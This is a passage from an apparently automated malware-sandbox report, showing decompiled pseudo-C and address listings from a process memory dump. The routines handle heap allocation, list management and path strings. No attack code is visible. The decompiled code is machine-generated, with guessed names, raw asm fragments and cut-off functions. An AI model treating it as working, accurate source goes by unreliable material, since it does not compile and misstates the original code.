                                                                                                                                    								L8:
                                                                                                                                    								_t81 =  *_t91;
                                                                                                                                    								goto L9;
                                                                                                                                    							} else {
                                                                                                                                    								_t90 = _v16;
                                                                                                                                    								_t79 = _v5;
                                                                                                                                    								goto L12;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}




























                                                                                                                                    0x04b4f028
                                                                                                                                    0x04b4f029
                                                                                                                                    0x04b4f029
                                                                                                                                    0x04b4f02c
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4f02c
                                                                                                                                    0x04b4eff3
                                                                                                                                    0x04b4eff9
                                                                                                                                    0x04b4f0ea
                                                                                                                                    0x04b4f0ed
                                                                                                                                    0x04b4f0ef
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4f0ef
                                                                                                                                    0x04b4f003
                                                                                                                                    0x04b9bb12
                                                                                                                                    0x04b4f045
                                                                                                                                    0x04b4f049
                                                                                                                                    0x04b4f051
                                                                                                                                    0x04b4f09e
                                                                                                                                    0x04b4f0a0
                                                                                                                                    0x04b4f0a0
                                                                                                                                    0x04b4f09e
                                                                                                                                    0x04b4f053
                                                                                                                                    0x04b4f064
                                                                                                                                    0x04b4f064
                                                                                                                                    0x04b4f06b
                                                                                                                                    0x04b9bb1a
                                                                                                                                    0x04b9bb1a
                                                                                                                                    0x04b4f071
                                                                                                                                    0x04b4f071
                                                                                                                                    0x04b4f07d
                                                                                                                                    0x04b4f082
                                                                                                                                    0x04b4f08f
                                                                                                                                    0x04b4f08f
                                                                                                                                    0x04b4f009
                                                                                                                                    0x04b4f00d
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4f00d
                                                                                                                                    0x04b4efd0
                                                                                                                                    0x04b4ef97
                                                                                                                                    0x04b4efa5
                                                                                                                                    0x04b4efaa
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4efac
                                                                                                                                    0x04b4efac
                                                                                                                                    0x04b4efac
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4efb2
                                                                                                                                    0x04b4f036
                                                                                                                                    0x04b4f03a
                                                                                                                                    0x04b4f040
                                                                                                                                    0x04b4f090
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4f092
                                                                                                                                    0x04b4f042
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4f042
                                                                                                                                    0x04b4efb7
                                                                                                                                    0x04b4efb9
                                                                                                                                    0x04b4efbc
                                                                                                                                    0x04b4efb0
                                                                                                                                    0x04b4efb0
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4efbe
                                                                                                                                    0x04b4efbe
                                                                                                                                    0x04b4efc1
                                                                                                                                    0x00000000
                                                                                                                                    0x04b4efc1
                                                                                                                                    0x04b4efbc
                                                                                                                                    0x04b4efaa
                                                                                                                                    0x04b4ef91

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                                    • Instruction ID: 8a301c1b7fafb278d8f802b8499df9a7816651195ac31e1daa6d3a95a7e4002e
                                                                                                                                    • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                                    • Instruction Fuzzy Hash: 8D51BD30A04249AFEB24CF68C190BAEBBB1FFC5314F1881E8D54597381D375B989E7A1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                    			E04C0740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                                                                                                                    				signed short* _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				intOrPtr _t55;
                                                                                                                                    				void* _t56;
                                                                                                                                    				intOrPtr* _t66;
                                                                                                                                    				intOrPtr* _t69;
                                                                                                                                    				void* _t74;
                                                                                                                                    				intOrPtr* _t78;
                                                                                                                                    				intOrPtr* _t81;
                                                                                                                                    				intOrPtr* _t82;
                                                                                                                                    				intOrPtr _t83;
                                                                                                                                    				signed short* _t84;
                                                                                                                                    				intOrPtr _t85;
                                                                                                                                    				signed int _t87;
                                                                                                                                    				intOrPtr* _t90;
                                                                                                                                    				intOrPtr* _t93;
                                                                                                                                    				intOrPtr* _t94;
                                                                                                                                    				void* _t98;
                                                                                                                                    
                                                                                                                                    				_t84 = __edx;
                                                                                                                                    				_t80 = __ecx;
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				_t55 = __ecx;
                                                                                                                                    				_v8 = __edx;
                                                                                                                                    				_t87 =  *__edx & 0x0000ffff;
                                                                                                                                    				_v12 = __ecx;
                                                                                                                                    				_t3 = _t55 + 0x154; // 0x154
                                                                                                                                    				_t93 = _t3;
                                                                                                                                    				_t78 =  *_t93;
                                                                                                                                    				_t4 = _t87 + 2; // 0x2
                                                                                                                                    				_t56 = _t4;
                                                                                                                                    				while(_t78 != _t93) {
                                                                                                                                    					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                                                                                                                    						L4:
                                                                                                                                    						_t78 =  *_t78;
                                                                                                                                    						continue;
                                                                                                                                    					} else {
                                                                                                                                    						_t7 = _t78 + 0x18; // 0x18
                                                                                                                                    						if(E04B8D4F0(_t7, _t84[2], _t87) == _t87) {
                                                                                                                                    							_t40 = _t78 + 0xc; // 0xc
                                                                                                                                    							_t94 = _t40;
                                                                                                                                    							_t90 =  *_t94;
                                                                                                                                    							while(_t90 != _t94) {
                                                                                                                                    								_t41 = _t90 + 8; // 0x8
                                                                                                                                    								_t74 = E04B7F380(_a4, _t41, 0x10);
                                                                                                                                    								_t98 = _t98 + 0xc;
                                                                                                                                    								if(_t74 != 0) {
                                                                                                                                    									_t90 =  *_t90;
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    								goto L12;
                                                                                                                                    							}
                                                                                                                                    							_t82 = L04B54620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                                                                                                    							if(_t82 != 0) {
                                                                                                                                    								_t46 = _t78 + 0xc; // 0xc
                                                                                                                                    								_t69 = _t46;
                                                                                                                                    								asm("movsd");
                                                                                                                                    								asm("movsd");
                                                                                                                                    								asm("movsd");
                                                                                                                                    								asm("movsd");
                                                                                                                                    								_t85 =  *_t69;
                                                                                                                                    								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                                                                                    									L20:
                                                                                                                                    									_t82 = 3;
                                                                                                                                    									asm("int 0x29");
                                                                                                                                    								}
                                                                                                                                    								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                                                                                                                    								 *_t82 = _t85;
                                                                                                                                    								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                                                                                                                    								 *_t69 = _t82;
                                                                                                                                    								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                                                                                                                    								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                                                                                                                    								goto L11;
                                                                                                                                    							} else {
                                                                                                                                    								L18:
                                                                                                                                    								_push(0xe);
                                                                                                                                    								_pop(0);
                                                                                                                                    							}
                                                                                                                                    						} else {
                                                                                                                                    							_t84 = _v8;
                                                                                                                                    							_t9 = _t87 + 2; // 0x2
                                                                                                                                    							_t56 = _t9;
                                                                                                                                    							goto L4;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					L12:
                                                                                                                                    					return 0;
                                                                                                                                    				}
                                                                                                                                    				_t10 = _t87 + 0x1a; // 0x1a
                                                                                                                                    				_t78 = L04B54620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                                                                                                                    				if(_t78 == 0) {
                                                                                                                                    					goto L18;
                                                                                                                                    				} else {
                                                                                                                                    					_t12 = _t87 + 2; // 0x2
                                                                                                                                    					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                                                                                                                    					_t16 = _t78 + 0x18; // 0x18
                                                                                                                                    					E04B7F3E0(_t16, _v8[2], _t87);
                                                                                                                                    					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                                                                                                                    					_t19 = _t78 + 0xc; // 0xc
                                                                                                                                    					_t66 = _t19;
                                                                                                                                    					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                                                                                                                    					 *_t66 = _t66;
                                                                                                                                    					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                                                                                                                    					_t81 = L04B54620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                                                                                                    					if(_t81 == 0) {
                                                                                                                                    						goto L18;
                                                                                                                                    					} else {
                                                                                                                                    						_t26 = _t78 + 0xc; // 0xc
                                                                                                                                    						_t69 = _t26;
                                                                                                                                    						asm("movsd");
                                                                                                                                    						asm("movsd");
                                                                                                                                    						asm("movsd");
                                                                                                                                    						asm("movsd");
                                                                                                                                    						_t85 =  *_t69;
                                                                                                                                    						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                                                                                    							goto L20;
                                                                                                                                    						} else {
                                                                                                                                    							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                                                                                                                    							 *_t81 = _t85;
                                                                                                                                    							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                                                                                                                    							 *_t69 = _t81;
                                                                                                                                    							_t83 = _v12;
                                                                                                                                    							 *(_t78 + 8) = 1;
                                                                                                                                    							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                                                                                                    							_t34 = _t83 + 0x154; // 0x1ba
                                                                                                                                    							_t69 = _t34;
                                                                                                                                    							_t85 =  *_t69;
                                                                                                                                    							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                                                                                    								goto L20;
                                                                                                                                    							} else {
                                                                                                                                    								 *_t78 = _t85;
                                                                                                                                    								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                                                                                                                    								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                                                                                                                    								 *_t69 = _t78;
                                                                                                                                    								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						goto L11;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				goto L12;
                                                                                                                                    			}






















                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                                    • Instruction ID: 3e0a7b40df1010eb2d5d7247298e03b5f0664a32badef4aaad6ef0091c21830a
                                                                                                                                    • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                                    • Instruction Fuzzy Hash: 67516E71601606EFDB19CF54C480A96BBB6FF45304F19C1AAE9089F252E371FA46CFA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B73D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				char _v12;
                                                                                                                                    				signed short** _t33;
                                                                                                                                    				short* _t38;
                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                    				intOrPtr* _t41;
                                                                                                                                    				signed short _t43;
                                                                                                                                    				intOrPtr* _t47;
                                                                                                                                    				intOrPtr* _t53;
                                                                                                                                    				signed short _t57;
                                                                                                                                    				intOrPtr _t58;
                                                                                                                                    				signed short _t60;
                                                                                                                                    				signed short* _t61;
                                                                                                                                    
                                                                                                                                    				_t47 = __ecx;
                                                                                                                                    				_t61 = __edx;
                                                                                                                                    				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                                                                                                                    				if(_t60 > 0xfffe) {
                                                                                                                                    					L22:
                                                                                                                                    					return 0xc0000106;
                                                                                                                                    				}
                                                                                                                                    				if(__edx != 0) {
                                                                                                                                    					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                                                                                                                    						L5:
                                                                                                                                    						E04B47B60(0, _t61, 0x4b111c4);
                                                                                                                                    						_v12 =  *_t47;
                                                                                                                                    						_v12 = _v12 + 0xfff8;
                                                                                                                                    						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                                                                                                                    						E04B47B60(0xfff8, _t61,  &_v12);
                                                                                                                                    						_t33 = _a8;
                                                                                                                                    						if(_t33 != 0) {
                                                                                                                                    							 *_t33 = _t61;
                                                                                                                                    						}
                                                                                                                                    						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                                    						_t53 = _a12;
                                                                                                                                    						if(_t53 != 0) {
                                                                                                                                    							_t57 = _t61[2];
                                                                                                                                    							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                                                                                                                    							while(_t38 >= _t57) {
                                                                                                                                    								if( *_t38 == 0x5c) {
                                                                                                                                    									_t41 = _t38 + 2;
                                                                                                                                    									if(_t41 == 0) {
                                                                                                                                    										break;
                                                                                                                                    									}
                                                                                                                                    									_t58 = 0;
                                                                                                                                    									if( *_t41 == 0) {
                                                                                                                                    										L19:
                                                                                                                                    										 *_t53 = _t58;
                                                                                                                                    										goto L7;
                                                                                                                                    									}
                                                                                                                                    									 *_t53 = _t41;
                                                                                                                                    									goto L7;
                                                                                                                                    								}
                                                                                                                                    								_t38 = _t38 - 2;
                                                                                                                                    							}
                                                                                                                                    							_t58 = 0;
                                                                                                                                    							goto L19;
                                                                                                                                    						} else {
                                                                                                                                    							L7:
                                                                                                                                    							_t39 = _a16;
                                                                                                                                    							if(_t39 != 0) {
                                                                                                                                    								 *_t39 = 0;
                                                                                                                                    								 *((intOrPtr*)(_t39 + 4)) = 0;
                                                                                                                                    								 *((intOrPtr*)(_t39 + 8)) = 0;
                                                                                                                                    								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                                                                                                                    							}
                                                                                                                                    							return 0;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					_t61 = _a4;
                                                                                                                                    					if(_t61 != 0) {
                                                                                                                                    						L3:
                                                                                                                                    						_t43 = L04B54620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                                                                                                                    						_t61[2] = _t43;
                                                                                                                                    						if(_t43 == 0) {
                                                                                                                                    							return 0xc0000017;
                                                                                                                                    						}
                                                                                                                                    						_t61[1] = _t60;
                                                                                                                                    						 *_t61 = 0;
                                                                                                                                    						goto L5;
                                                                                                                                    					}
                                                                                                                                    					goto L22;
                                                                                                                                    				}
                                                                                                                                    				_t61 = _a4;
                                                                                                                                    				if(_t61 == 0) {
                                                                                                                                    					return 0xc000000d;
                                                                                                                                    				}
                                                                                                                                    				goto L3;
                                                                                                                                    			}

















                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 859a738e5a044355457ddc5d59d1fd5ec350cb893a1ccbd2f56142440889aadd
                                                                                                                                    • Instruction ID: e171fd617bfa804afd56be0a86a598c9d4c459c29ce77dde41909938448962bc
                                                                                                                                    • Opcode Fuzzy Hash: 859a738e5a044355457ddc5d59d1fd5ec350cb893a1ccbd2f56142440889aadd
                                                                                                                                    • Instruction Fuzzy Hash: 3531BE31704615DBC7248F29C841A6ABBE5EF95700B05C4EAE865CB360F730E840F7A1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                    			E04BB7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				char _v588;
                                                                                                                                    				intOrPtr _v592;
                                                                                                                                    				intOrPtr _v596;
                                                                                                                                    				signed short* _v600;
                                                                                                                                    				char _v604;
                                                                                                                                    				short _v606;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				signed short* _t55;
                                                                                                                                    				void* _t56;
                                                                                                                                    				signed short* _t58;
                                                                                                                                    				signed char* _t61;
                                                                                                                                    				char* _t68;
                                                                                                                                    				void* _t69;
                                                                                                                                    				void* _t71;
                                                                                                                                    				void* _t72;
                                                                                                                                    				signed int _t75;
                                                                                                                                    
                                                                                                                                    				_t64 = __edx;
                                                                                                                                    				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                                                                                                                    				_v8 =  *0x4c2d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                                                                                                                    				_t55 = _a16;
                                                                                                                                    				_v606 = __ecx;
                                                                                                                                    				_t71 = 0;
                                                                                                                                    				_t58 = _a12;
                                                                                                                                    				_v596 = __edx;
                                                                                                                                    				_v600 = _t58;
                                                                                                                                    				_t68 =  &_v588;
                                                                                                                                    				if(_t58 != 0) {
                                                                                                                                    					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                                                                                                                    					if(_t55 != 0) {
                                                                                                                                    						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				_t8 = _t71 + 0x2a; // 0x28
                                                                                                                                    				_t33 = _t8;
                                                                                                                                    				_v592 = _t8;
                                                                                                                                    				if(_t71 <= 0x214) {
                                                                                                                                    					L6:
                                                                                                                                    					 *((short*)(_t68 + 6)) = _v606;
                                                                                                                                    					if(_t64 != 0xffffffff) {
                                                                                                                                    						asm("cdq");
                                                                                                                                    						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                                                                                                                    						 *((char*)(_t68 + 0x28)) = _a4;
                                                                                                                                    						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                                                                                                                    						 *((char*)(_t68 + 0x29)) = _a8;
                                                                                                                                    						if(_t71 != 0) {
                                                                                                                                    							_t22 = _t68 + 0x2a; // 0x2a
                                                                                                                                    							_t64 = _t22;
                                                                                                                                    							E04BB6B4C(_t58, _t22, _t71,  &_v604);
                                                                                                                                    							if(_t55 != 0) {
                                                                                                                                    								_t25 = _v604 + 0x2a; // 0x2a
                                                                                                                                    								_t64 = _t25 + _t68;
                                                                                                                                    								E04BB6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                                                                                                                    							}
                                                                                                                                    							if(E04B57D50() == 0) {
                                                                                                                                    								_t61 = 0x7ffe0384;
                                                                                                                                    							} else {
                                                                                                                                    								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                                    							}
                                                                                                                                    							_push(_t68);
                                                                                                                                    							_push(_v592 + 0xffffffe0);
                                                                                                                                    							_push(0x402);
                                                                                                                                    							_push( *_t61 & 0x000000ff);
                                                                                                                                    							E04B79AE0();
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					_t35 =  &_v588;
                                                                                                                                    					if( &_v588 != _t68) {
                                                                                                                                    						_t35 = L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                                                                                                                    					}
                                                                                                                                    					L16:
                                                                                                                                    					_pop(_t69);
                                                                                                                                    					_pop(_t72);
                                                                                                                                    					_pop(_t56);
                                                                                                                                    					return E04B7B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                                                                                                                    				}
                                                                                                                                    				_t68 = L04B54620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                                                                                                                    				if(_t68 == 0) {
                                                                                                                                    					goto L16;
                                                                                                                                    				} else {
                                                                                                                                    					_t58 = _v600;
                                                                                                                                    					_t64 = _v596;
                                                                                                                                    					goto L6;
                                                                                                                                    				}
                                                                                                                                    			}























                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2e0e407b416d1274603d6f16ec410fdc754bfa922a9d16cf435cf6ca6e085298
                                                                                                                                    • Instruction ID: 936d665849870f30195055c66e90d7f83e87b2fa97cc71221a234b3879fa8814
                                                                                                                                    • Opcode Fuzzy Hash: 2e0e407b416d1274603d6f16ec410fdc754bfa922a9d16cf435cf6ca6e085298
                                                                                                                                    • Instruction Fuzzy Hash: 663180726047519BC320DF68C941ABAB7A5FFC8700F044A69F89587790EB70F914CBE6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                    			E04B5C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                                                                                                                    				signed int* _v8;
                                                                                                                                    				char _v16;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				signed char _t33;
                                                                                                                                    				signed char _t43;
                                                                                                                                    				signed char _t48;
                                                                                                                                    				signed char _t62;
                                                                                                                                    				void* _t63;
                                                                                                                                    				intOrPtr _t69;
                                                                                                                                    				intOrPtr _t71;
                                                                                                                                    				unsigned int* _t82;
                                                                                                                                    				void* _t83;
                                                                                                                                    
                                                                                                                                    				_t80 = __ecx;
                                                                                                                                    				_t82 = __edx;
                                                                                                                                    				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                                                                                                                    				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                                                                                                                    				if((_t33 & 0x00000001) != 0) {
                                                                                                                                    					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                                                                                                                    					if(E04B57D50() != 0) {
                                                                                                                                    						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                                    					} else {
                                                                                                                                    						_t43 = 0x7ffe0386;
                                                                                                                                    					}
                                                                                                                                    					if( *_t43 != 0) {
                                                                                                                                    						_t43 = E04C08D34(_v8, _t80);
                                                                                                                                    					}
                                                                                                                                    					E04B52280(_t43, _t82);
                                                                                                                                    					if( *((char*)(_t80 + 0xdc)) == 0) {
                                                                                                                                    						E04B4FFB0(_t62, _t80, _t82);
                                                                                                                                    						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                                                                                                                    						_t30 = _t80 + 0xd0; // 0xd0
                                                                                                                                    						_t83 = _t30;
                                                                                                                                    						E04C08833(_t83,  &_v16);
                                                                                                                                    						_t81 = _t80 + 0x90;
                                                                                                                                    						E04B4FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                                                                                                                    						_t63 = 0;
                                                                                                                                    						_push(0);
                                                                                                                                    						_push(_t83);
                                                                                                                                    						_t48 = E04B7B180();
                                                                                                                                    						if(_a4 != 0) {
                                                                                                                                    							E04B52280(_t48, _t81);
                                                                                                                                    						}
                                                                                                                                    					} else {
                                                                                                                                    						_t69 = _v8;
                                                                                                                                    						_t12 = _t80 + 0x98; // 0x98
                                                                                                                                    						_t13 = _t69 + 0xc; // 0x575651ff
                                                                                                                                    						E04B5BB2D(_t13, _t12);
                                                                                                                                    						_t71 = _v8;
                                                                                                                                    						_t15 = _t80 + 0xb0; // 0xb0
                                                                                                                                    						_t16 = _t71 + 8; // 0x8b000cc2
                                                                                                                                    						E04B5BB2D(_t16, _t15);
                                                                                                                                    						E04B5B944(_v8, _t62);
                                                                                                                                    						 *((char*)(_t80 + 0xdc)) = 0;
                                                                                                                                    						E04B4FFB0(0, _t80, _t82);
                                                                                                                                    						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                                                                                                                    						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                                                                                                                    						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                                                                                                                    						 *(_t80 + 0xde) = 0;
                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                    							_t25 = _t80 + 0x90; // 0x90
                                                                                                                                    							E04B4FFB0(0, _t80, _t25);
                                                                                                                                    						}
                                                                                                                                    						_t63 = 1;
                                                                                                                                    					}
                                                                                                                                    					return _t63;
                                                                                                                                    				}
                                                                                                                                    				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                                                                                                                    				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                                                                                                                    				if(_a4 == 0) {
                                                                                                                                    					_t24 = _t80 + 0x90; // 0x90
                                                                                                                                    					E04B4FFB0(0, __ecx, _t24);
                                                                                                                                    				}
                                                                                                                                    				return 0;
                                                                                                                                    			}
















                                                                                                                                    0x04b5c276
                                                                                                                                    0x04b5c27d
                                                                                                                                    0x04b5c27d
                                                                                                                                    0x04b5c25c
                                                                                                                                    0x04b5c25c
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5c25e
                                                                                                                                    0x04b5c1a4
                                                                                                                                    0x04b5c1aa
                                                                                                                                    0x04b5c1b3
                                                                                                                                    0x04b5c265
                                                                                                                                    0x04b5c26c
                                                                                                                                    0x04b5c26c
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                                    • Instruction ID: a80130ef1c69d1941d5fa72ba1f1a86701aa0106c4aff43570cb4d3d4e3057ff
                                                                                                                                    • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                                    • Instruction Fuzzy Hash: 6E314871705646AFEB04EBB4C480BE9FB65FF42248F0481DAC91C47351DB357A15EBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                    			E04B6E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                                                                                                                    				intOrPtr* _v0;
                                                                                                                                    				signed char _v4;
                                                                                                                                    				signed int _v8;
                                                                                                                                    				void* __ecx;
                                                                                                                                    				void* __ebp;
                                                                                                                                    				void* _t37;
                                                                                                                                    				intOrPtr _t38;
                                                                                                                                    				signed int _t44;
                                                                                                                                    				signed char _t52;
                                                                                                                                    				void* _t54;
                                                                                                                                    				intOrPtr* _t56;
                                                                                                                                    				void* _t58;
                                                                                                                                    				char* _t59;
                                                                                                                                    				signed int _t62;
                                                                                                                                    
                                                                                                                                    				_t58 = __edx;
                                                                                                                                    				_push(0);
                                                                                                                                    				_push(4);
                                                                                                                                    				_push( &_v8);
                                                                                                                                    				_push(0x24);
                                                                                                                                    				_push(0xffffffff);
                                                                                                                                    				if(E04B79670() < 0) {
                                                                                                                                    					L04B8DF30(_t54, _t58, _t35);
                                                                                                                                    					asm("int3");
                                                                                                                                    					asm("int3");
                                                                                                                                    					asm("int3");
                                                                                                                                    					asm("int3");
                                                                                                                                    					asm("int3");
                                                                                                                                    					asm("int3");
                                                                                                                                    					_push(_t54);
                                                                                                                                    					_t52 = _v4;
                                                                                                                                    					if(_t52 > 8) {
                                                                                                                                    						_t37 = 0xc0000078;
                                                                                                                                    					} else {
                                                                                                                                    						_t38 =  *0x4c27b9c; // 0x0
                                                                                                                                    						_t62 = _t52 & 0x000000ff;
                                                                                                                                    						_t59 = L04B54620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                                                                                                                    						if(_t59 == 0) {
                                                                                                                                    							_t37 = 0xc0000017;
                                                                                                                                    						} else {
                                                                                                                                    							_t56 = _v0;
                                                                                                                                    							 *(_t59 + 1) = _t52;
                                                                                                                                    							 *_t59 = 1;
                                                                                                                                    							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
